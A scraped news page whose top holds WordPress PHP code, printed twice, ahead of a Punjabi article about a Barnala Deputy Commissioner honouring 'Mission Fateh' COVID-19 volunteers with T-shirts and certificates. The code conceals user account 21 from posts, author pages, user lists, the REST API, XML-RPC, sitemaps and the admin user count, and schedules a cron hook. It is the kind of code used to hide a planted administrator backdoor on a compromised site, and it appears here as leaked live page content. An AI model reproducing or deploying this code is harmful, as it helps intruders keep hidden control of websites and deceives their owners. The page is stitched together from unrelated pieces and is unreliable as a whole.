add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
ਡਿਪਟੀ ਕਮਿਸ਼ਨਰ ਵੱਲੋਂ ਮਿਸ਼ਨ ਫਤਿਹ ਯੋਧਿਆਂ ਦਾ ਟੀ-ਸ਼ਰਟਾਂ ਅਤੇ ਸਰਟੀਫਿਕੇਟਾਂ ਨਾਲ ਸਨਮਾਨ - Press Ki Taquat
No Result
View All Result
ਸਹਾਇਕ ਡਾਇਰੈਕਟਰ ਯੁਵਕ ਸੇਵਾਵਾਂ ਸਣੇ 2 ਦੀ ਝੋਲੀ ਪਿਆ ਸਿਲਵਰ ਪੁਰਸਕਾਰ
ਬਰਨਾਲਾ, 17 ਜੁਲਾਈ (ਰਾਕੇਸ਼ ਗੋਇਲ/ਰਾਹੁਲ ਬਾਲੀ):- ਪੰਜਾਬ ਸਰਕਾਰ ਵੱਲੋਂ ਕਰੋਨਾ ਵਾਇਰਸ ਤੋਂ ਬਚਾਅ ਲਈ ਕੁਝ ਅਹਿਮ ਨੁਕਤਿਆਂ ਬਾਰੇ ਲੋਕਾਂ ਨੂੰ ਜਾਗਰੂਕ ਕਰਨ ਲਈ ‘ਮਿਸ਼ਨ ਫਤਿਹ’ ਚਲਾਇਆ ਗਿਆ ਹੈ, ਜਿਸ ਤਹਿਤ ਮਿਸ਼ਨ ਫਤਿਹ ਯੋਧਿਆਂ ਨੇ ਸ਼ਲਾਘਾਯੋਗ ਸੇਵਾਵਾਂ ਨਿਭਾਈਆਂ ਹਨ।
ਇਹ ਪ੍ਰਗਟਾਵਾ ਡਿਪਟੀ ਕਮਿਸ਼ਨਰ ਬਰਨਾਲਾ ਸ੍ਰੀ ਤੇਜ ਪ੍ਰਤਾਪ ਸਿੰਘ ਫੂਲਕਾ ਵੱਲੋਂ ਮਿਸ਼ਨ ਫਤਿਹ ਯੋਧਿਆਂ ਦਾ ਸਨਮਾਨ ਕਰਨ ਮੌਕੇ ਕੀਤਾ ਗਿਆ। ਡਿਪਟੀ ਕਮਿਸ਼ਨਰ ਵੱਲੋਂ ਇਨ੍ਹਾਂ ਮਿਸ਼ਨ ਫਤਿਹ ਯੋਧਿਆਂ ਨੂੰ ਟੀ-ਸ਼ਰਟਾਂ ਅਤੇ ਸਰਟੀਫਿਕੇਟਾਂ ਨਾਲ ਸਨਮਾਨਿਆ ਗਿਆ ਅਤੇ ਇਨ੍ਹਾਂ ਨੌਜਵਾਨ ਯੋਧਿਆਂ ਦੀ ਸੇਵਾਵਾਂ ਨੂੰ ਸਲਾਹਿਆ ਗਿਆ, ਜਿਨ੍ਹਾਂ ਨੇ ਵੱਧ ਤੋਂ ਵੱੱਧ ਲੋਕਾਂ ਨੂੰ ਕੋਵਾ ਐਪ ਡਾਊਨਲੋਡ ਕਰਵਾ ਕੇ ਕਰੋਨਾ ਵਾਇਰਸ ਤੋਂ ਬਚਾਅ ਬਾਰੇ ਜਾਗਰੂਕ ਕੀਤਾ ਹੈ।
ਇਨ੍ਹਾਂ ਯੋਧਿਆਂ ਵਿਚੋਂ ਸਹਾਇਕ ਡਾਇਰੈਕਟਰ ਯੁਵਕ ਸੇਵਾਵਾਂ ਸ੍ਰੀ ਵਿਜੈ ਭਾਸਕਰ ਵੀ ਸ਼ਾਮਲ ਹਨ, ਜਿਨ੍ਹਾਂ ਨੇ ਇਕ ਗੋਲਡ, ਇਕ ਸਿਲਵਰ ਅਤੇ ਇਕ ਬਰੌਂਨਜ਼ ਸਰਟੀਫਿਕੇਟ ਜਿੱਤ ਕੇ ਜ਼ਿਲ੍ਹਾ ਬਰਨਾਲਾ ਵਿਚ ਮੋਹਰੀ ਸਥਾਨ ਹਾਸਲ ਕੀਤਾ ਹੈ ਅਤੇ ਸੂਬਾ ਪੱਧਰ ’ਤੇ ਮਿਸ਼ਨ ਫਤਿਹ ਯੋਧਿਆਂ ਦੀ ਰੈਂਕਿੰਗ ਵਿੱਚ ਪਹਿਲੇ 10 ਵਿਚ ਆਪਣਾ ਸਥਾਨ ਬਣਾਇਆ ਹੈ। ਹੁਣ ਤੱਕ ਜ਼ਿਲ੍ਹਾ ਬਰਨਾਲਾ ਦੀ ਝੋਲੀ ਇਕ ਗੋਡਲ, ਦੋ ਸਿਲਵਰ ਅਤੇ 23 ਬਰੌਂਨਜ਼ ਸਰਟੀਫਿਕੇਟ ਪਏ ਹਨ।
ਇਸ ਮੌਕੇ ਡਿਪਟੀ ਕਮਿਸ਼ਨਰ ਨੇ ਦੱਸਿਆ ਕਿ ਪੰਜਾਬ ਸਰਕਾਰ ਵੱਲੋਂ ਚਲਾਏ ਮਿਸ਼ਨ ਫਤਿਹ ਤਹਿਤ ਜਿਹੜੇ ਲੋਕ ਵੱਧ ਤੋਂ ਵੱਧ ਲੋਕਾਂ ਨੂੰ ਮੋਬਾਈਲ ’ਤੇ ਮਿਸ਼ਨ ਫਤਿਹ ਐਪਲੀਕੇਸ਼ਨ ਡਾਊਨਲੋਡ ਕਰਵਾ ਕੇ ਪੁਆਇੰਟ ਹਾਸਲ ਕਰ ਰਹੇ ਹਨ ਅਤੇ ਸਾਰੇ ਇਹਤਿਆਤ ਵਰਤ ਰਹੇ ਹਨ, ਉਹ ਸੂਬਾ ਪੱਧਰ ਦੀ ਰੈਕਿੰਗ ’ਚ ਸ਼ੁਮਾਰ ਹੋ ਕੇ ਗੋਲਡ, ਸਿਲਵਰ ਤੇ ਬਰੌਂਨਜ਼ ਪੁਰਸਕਾਰ ਜਿੱਤ ਰਹੇ ਹਨ।
ਅੱਜ ਸਹਾਇਕ ਡਾਇਰੈਕਟਰ ਸ੍ਰੀ ਵਿਜੈ ਭਾਸਕਰ ਅਤੇ ਵਲੰਟੀਅਰ ਹਰਪ੍ਰੀਤ ਸਿੰਘ ਦਾ ਸਿਲਵਰ ਸਰਟੀਫਿਕੇਟਾਂ ਨਾਲ ਸਨਮਾਨ ਕੀਤਾ ਗਿਆ, ਜਦੋਂਕਿ ਹੋਰ ਵਲੰਟੀਅਰਾਂ ਦਾ ਬਰੌਂਨਜ਼ ਸਰਟੀਫਿਕੇਟਾਂ ਅਤੇ ਟੀ ਸ਼ਰਟਾਂ ਨਾਲ ਸਨਮਾਨ ਕੀਤਾ ਗਿਆ। ਇਸੇ ਤਰ੍ਹਾਂ ਆਉਂਦੇ ਦਿਨੀਂ ਹੋਰ ਮਿਸ਼ਨ ਫਤਿਹ ਯੋਧਿਆਂ ਦਾ ਵਾਰੋ-ਵਾਰੀ ਸਨਮਾਨ ਕੀਤਾ ਜਾਵੇਗਾ।
ਡਿਪਟੀ ਕਮਿਸ਼ਨਰ ਨੇ ਜ਼ਿਲ੍ਹਾ ਵਾਸੀਆਂ ਨੂੰ ਅਪੀਲ ਕੀਤੀ ਕਿ ਉਹ ਆਪਣੇ ਮੋਬਾਈਲ ’ਤੇ ਕੋਵਾ ਪੰਜਾਬ ਐਪ ਡਾਊਨਲੋਡ ਕਰਨ ਅਤੇ ਮਿਸ਼ਨ ਫਤਿਹ ਜੁਆਇਨ ਕਰਨ। ਇਸ ਐਪਲੀਕੇਸ਼ਨ ਰਾਹੀਂ ਕਰੋਨਾ ਤੋਂ ਬਚਾਅ ਸਬੰਧੀ ਨੁਕਤੇ, ਈ-ਪਾਸ, ਡਾਕਟਰੀ ਸਹਾਇਤਾਂ ਆਦਿ ਸੇਵਾਵਾਂ ਦਾ ਲਾਭ ਲੈਣ ਅਤੇ ਕਰੋਨਾ ਵਾਇਰਸ ਤੋਂ ਬਚਣ ਲਈ ਮਾਸਕ ਪਾਉਣਾ, ਹੱਥ ਧੋਣੇ ਤੇ ਸਮਾਜਿਕ ਦੂਰੀ ਰੱਖਣਾ ਯਕੀਨੀ ਬਣਾਉਣ।
Post Views: 94
No Result
View All Result